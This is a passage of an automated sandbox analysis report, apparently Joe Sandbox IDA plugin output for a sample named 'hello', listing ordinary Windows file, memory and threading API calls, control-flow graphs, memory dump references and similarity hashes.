                                        • WaitForSingleObject.KERNEL32(000000FF,?,00404AFB,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401570
                                          • Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                          • Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                          • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                          • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                          • Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                          • Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                          • Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                          • Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                          • Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                          • Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                          • Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
                                        • String ID:
                                        • API String ID: 359084233-0
                                        • Opcode ID: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
                                        • Instruction ID: 87277f5b9ffc23463226fd0df2644328d4cfb3d5af9d6e9341eee715f5e270ad
                                        • Opcode Fuzzy Hash: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
                                        • Instruction Fuzzy Hash: 8231F171644200BBDA305B15DC86EBB37B9EBC5350F24843BF522F92F0CA79A941DA5E

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1300 401986-401995 CreateDirectoryW 1301 4019c7-4019cb 1300->1301 1302 401997-4019a4 GetLastError 1300->1302 1303 4019b1-4019be GetFileAttributesW 1302->1303 1304 4019a6 1302->1304 1303->1301 1306 4019c0-4019c2 1303->1306 1305 4019a7-4019b0 SetLastError 1304->1305 1306->1301 1307 4019c4-4019c5 1306->1307 1307->1305
                                        APIs
                                        • CreateDirectoryW.KERNELBASE(004033CE,00000000,-00000001,004033CE,?,00404AC6,?,?,?,?,00404AC6,?), ref: 0040198D
                                        • GetLastError.KERNEL32(?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401997
                                        • SetLastError.KERNEL32(000000B7,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019A7
                                        • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019B5
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: ErrorLast$AttributesCreateDirectoryFile
                                        • String ID:
                                        • API String ID: 635176117-0
                                        • Opcode ID: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
                                        • Instruction ID: 5ae0be16486f509c6b40768ba71a6c1c2cea9be4331c5fc90c1b41dbeb0419e3
                                        • Opcode Fuzzy Hash: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
                                        • Instruction Fuzzy Hash: D5E09AB0518250AFDE142BB4BD187DB3AA5AF46362F508932F495E02F0C33888428A89

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1308 404a44-404a62 call 408676 ??2@YAPAXI@Z 1311 404a64-404a6b call 40a9f8 1308->1311 1312 404a6d 1308->1312 1314 404a6f-404a91 call 408726 call 40dcfb 1311->1314 1312->1314 1341 404a92 call 40b2fc 1314->1341 1342 404a92 call 40a7de 1314->1342 1319 404a95-404a97 1320 404ab3-404abd 1319->1320 1321 404a99-404aa9 call 407776 1319->1321 1323 404ada-404ae4 ??2@YAPAXI@Z 1320->1323 1324 404abf-404ac1 call 403354 1320->1324 1337 404aae-404ab2 1321->1337 1325 404ae6-404aed call 404292 1323->1325 1326 404aef 1323->1326 1331 404ac6-404ac9 1324->1331 1330 404af1-404af6 call 40150b 1325->1330 1326->1330 1336 404afb-404afd 1330->1336 1331->1323 1335 404acb 1331->1335 1338 404ad0-404ad8 1335->1338 1336->1338 1338->1337 1341->1319 1342->1319
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(000001E8,00000000,?,ExecuteFile,00000011,?,00405D20,?,00417788,00417788), ref: 00404A5A
                                        • ??2@YAPAXI@Z.MSVCRT(00000040,?,?,?,?,?,?,?,?,00000000,?), ref: 00404ADC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: ??2@
                                        • String ID: ExecuteFile
                                        • API String ID: 1033339047-323923146
                                        • Opcode ID: 612dc6f8e3fe8df0745ed42aa02adea807ab2e0a0b71f5bf8dc2b3d1454147a6
                                        • Instruction ID: 446d0bd8c70a379003bbf02419fa435b46014474c8a02eb0da5acec479ce97d7
                                        • Opcode Fuzzy Hash: 612dc6f8e3fe8df0745ed42aa02adea807ab2e0a0b71f5bf8dc2b3d1454147a6
                                        • Instruction Fuzzy Hash: EA1184B5340104BFD710AB659C85D6B73A8EF80355724443FF602B72D1DA789D418A6D

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1343 40adc3-40adce 1344 40add0-40add3 1343->1344 1345 40ae0d-40ae0f 1343->1345 1346 40add5-40ade3 ??2@YAPAXI@Z 1344->1346 1347 40adfb 1344->1347 1348 40adfd-40ae0c ??3@YAXPAX@Z 1346->1348 1349 40ade5-40ade7 1346->1349 1347->1348 1348->1345 1350 40ade9 1349->1350 1351 40adeb-40adf9 memmove 1349->1351 1350->1351 1351->1348
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                        • memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: ??2@??3@memmove
                                        • String ID:
                                        • API String ID: 3828600508-0
                                        • Opcode ID: 2c1e852e3357fe345785b0ad8426fcfe448c8ec3a37487201466d82e595bf6a2
                                        • Instruction ID: a8ce0a3cb4653ecb547b1a3698f229d81d6147035ad3680bc60947505803a3f4
                                        • Opcode Fuzzy Hash: 2c1e852e3357fe345785b0ad8426fcfe448c8ec3a37487201466d82e595bf6a2
                                        • Instruction Fuzzy Hash: 74F089763047016FC3205B1ADC80857BBABDFC4715311883FE55E93A50D634F891965A
                                        APIs
                                        • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 0040247E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: GlobalMemoryStatus
                                        • String ID: @
                                        • API String ID: 1890195054-2766056989
                                        • Opcode ID: e165e649a9da5613d175048000a137ea24de4513e4899c41680211bbe6bcf060
                                        • Instruction ID: 9ce3ff159218229c34eda893c3d8d64f83397f3f2cddac743d7c565554413103
                                        • Opcode Fuzzy Hash: e165e649a9da5613d175048000a137ea24de4513e4899c41680211bbe6bcf060
                                        • Instruction Fuzzy Hash: AAF0AF30A042048ADF15AB719E8DA5A37A4BB00348F10853AF516F52D4D7BCE9048B5D
                                        APIs
                                          • Part of subcall function 0040AAAB: _CxxThrowException.MSVCRT(?,00414EF8), ref: 0040AAC5
                                          • Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                          • Part of subcall function 0040ADC3: memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                          • Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,004149F0,?,004149B0), ref: 0040CAF2
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,004149F0,?,004149B0), ref: 0040CC4A
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: ??3@$??2@ExceptionThrowmemmove
                                        • String ID:
                                        • API String ID: 4269121280-0
                                        • Opcode ID: 55a34ad2a1bb823cdc9ec8962d94a78352b48210c79ef81d7d99dd1713e8f51f
                                        • Instruction ID: 88480e7f7e551c391a26326ce122d220a9eefc885560dc6ed21150e7f5ba8ef6
                                        • Opcode Fuzzy Hash: 55a34ad2a1bb823cdc9ec8962d94a78352b48210c79ef81d7d99dd1713e8f51f
                                        • Instruction Fuzzy Hash: 00712571A00209EFCB24DFA5C8D1AAEBBB1FF08314F10463AE545A3291D739A945CF99
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: ??3@H_prolog
                                        • String ID:
                                        • API String ID: 1329742358-0
                                        • Opcode ID: 6656e43d2981dee3a96cb881ff7527404ad10ce0abe68b4cdaafc38c009261e5
                                        • Instruction ID: 956102545b91a7c0cba0a64d671320761176ea25dc816e9057e3d4af94f09eda
                                        • Opcode Fuzzy Hash: 6656e43d2981dee3a96cb881ff7527404ad10ce0abe68b4cdaafc38c009261e5
                                        • Instruction Fuzzy Hash: 0D411F32800204AFCB09DB65CD45EBE7B35EF50304B18883BF402B72E2D63E9E21965B
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: ??2@??3@
                                        • String ID:
                                        • API String ID: 1936579350-0
                                        • Opcode ID: ebac23084a16b944365a47061f6b21e986bd860b63916dd214b45b095081060c
                                        • Instruction ID: 063e94d8e06ff9613a5b681c15dc067c338ae4066a9753272274ce5f9f11bd0f
                                        • Opcode Fuzzy Hash: ebac23084a16b944365a47061f6b21e986bd860b63916dd214b45b095081060c
                                        • Instruction Fuzzy Hash: 71F0A476210612ABC334DF2DC581867B3E4EF88711710893FE6C7C72B1DA31A881C754
                                        APIs
                                        • SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040DA0B
                                        • GetLastError.KERNEL32(?,?,?,?), ref: 0040DA19
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: ErrorFileLastPointer
                                        • String ID:
                                        • API String ID: 2976181284-0
                                        • Opcode ID: d304dccc413f9fbc2375b0c992bb18d0fa27bc648f40137314f68655dcdcf89d
                                        • Instruction ID: d86f9e507f4e039952bd1031b0dc001be1b0661bb6f0ed5f18f0f7cd7a7605a3
                                        • Opcode Fuzzy Hash: d304dccc413f9fbc2375b0c992bb18d0fa27bc648f40137314f68655dcdcf89d
                                        • Instruction Fuzzy Hash: FCF0B2B8A04208FFCB04CFA8D8448AE7BB9EB49314B2085A9F815A7390D735DA04DF64
                                        APIs
                                        • SysAllocString.OLEAUT32(?), ref: 0040ED05
                                        • _CxxThrowException.MSVCRT(?,00415010), ref: 0040ED28
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: AllocExceptionStringThrow
                                        • String ID:
                                        • API String ID: 3773818493-0
                                        • Opcode ID: 34848b6f66320e7823decd545e24a334e79eeaa2350f65fc9219e56b57dd4bad
                                        • Instruction ID: 896a1b371a95ab63a3f889c911e7bff8eb1facf706b7c8fcc1dab20228dace7a
                                        • Opcode Fuzzy Hash: 34848b6f66320e7823decd545e24a334e79eeaa2350f65fc9219e56b57dd4bad
                                        • Instruction Fuzzy Hash: CDE06D71600309ABDB10AF66D8419D67BE8EF00380B00C83FF948CA250E779E590C7D9
                                        APIs
                                        • EnterCriticalSection.KERNEL32(?), ref: 0040E745
                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 0040E764
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterLeave
                                        • String ID:
                                        • API String ID: 3168844106-0
                                        • Opcode ID: 91dbafe27853da7d419d240d9f0ee1b362973845cd939a0bd3a75ec29d074311
                                        • Instruction ID: 086d926b78662e0ab04275255430a857868cdabe8091615e808f779c17768b54
                                        • Opcode Fuzzy Hash: 91dbafe27853da7d419d240d9f0ee1b362973845cd939a0bd3a75ec29d074311
                                        • Instruction Fuzzy Hash: 76F05436200214FBCB119F95DC08E9BBBB9FF49761F14842AF945E7260C771E821DBA4
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: e5321c9a15e7e390b560e3b31c2ad4413e862a9b2ae91dd544a8c0e33ade4a6e
                                        • Instruction ID: 39d544f4fee3d18347c8ea8d59cce7c7d4ef222c74644271f89bd24cd9d44c54
                                        • Opcode Fuzzy Hash: e5321c9a15e7e390b560e3b31c2ad4413e862a9b2ae91dd544a8c0e33ade4a6e
                                        • Instruction Fuzzy Hash: 4B2180316003099BCB14EFA5C945AAE73B5EF40344F14843EF806BB291DB38DD16CB1A
                                        APIs
                                        • SetFileAttributesW.KERNELBASE(?,?), ref: 0040124F
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 5adc5d60a7dd4af011d60b8927d5fbfdd00464e259639d1fcd3b0c23b8927a9d
                                        • Instruction ID: 5817d5120c2da98d16edaa91ace5ca285f5b3ff1e58b2ffd557e42fef7bfdc6e
                                        • Opcode Fuzzy Hash: 5adc5d60a7dd4af011d60b8927d5fbfdd00464e259639d1fcd3b0c23b8927a9d
                                        • Instruction Fuzzy Hash: 66F05E72100201DBC720AF98C840BA777F5BB84314F04483EE583F2AA0D778B885CB59
                                        APIs
                                          • Part of subcall function 0040D985: CloseHandle.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990
                                        • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50), ref: 0040DA78
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: CloseCreateFileHandle
                                        • String ID:
                                        • API String ID: 3498533004-0
                                        • Opcode ID: 08bceb1980caaee1328d4f84b7def86f7a2986f91a3075995b51455990be9560
                                        • Instruction ID: 040011ad7fb3de3f437c6c7e3ebc1dcda5640d8293b7e84d035d3e38099293ab
                                        • Opcode Fuzzy Hash: 08bceb1980caaee1328d4f84b7def86f7a2986f91a3075995b51455990be9560
                                        • Instruction Fuzzy Hash: A1E04F32140219ABCF215FA49C01BCA7B96AF09760F144526BE11A61E0C672D465AF94
                                        APIs
                                        • WriteFile.KERNELBASE(?,?,00000001,00000000,00000000,?,?,0040DD78,00000001,00000000,00000000,00413330,?,00404D94,?,?), ref: 0040DBBA
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: FileWrite
                                        • String ID:
                                        • API String ID: 3934441357-0
                                        • Opcode ID: 3077b537328fed6cd21bdd98b87c61334e39a2b5a14a0e6e22fef2783c677b0b
                                        • Instruction ID: ec3d056ad33d5175d1bee219b94afd5900c8108b90431a53c6143dcb1d381838
                                        • Opcode Fuzzy Hash: 3077b537328fed6cd21bdd98b87c61334e39a2b5a14a0e6e22fef2783c677b0b
                                        • Instruction Fuzzy Hash: D7E0C275600208FBCB00CF95C801B9E7BBABB49755F10C069F918AA2A0D739AA10DF54
                                        APIs
                                        • _beginthreadex.MSVCRT ref: 00406552
                                          • Part of subcall function 00406501: GetLastError.KERNEL32(00406563,00000000), ref: 004064F5
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: ErrorLast_beginthreadex
                                        • String ID:
                                        • API String ID: 4034172046-0
                                        • Opcode ID: e5ca857e6cae9760b500a95e192be9ea992c298de85bf840c792a1269a380ec9
                                        • Instruction ID: fe95790bd269afcad05a26a3721163fc0b830ac61c9b3c5b6bbddf8a66cf2d64
                                        • Opcode Fuzzy Hash: e5ca857e6cae9760b500a95e192be9ea992c298de85bf840c792a1269a380ec9
                                        • Instruction Fuzzy Hash: 12D05EF6400208BFDF01DFE0DC05CAB3BADEB08204B004464FD05C2150E632DA108B60
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
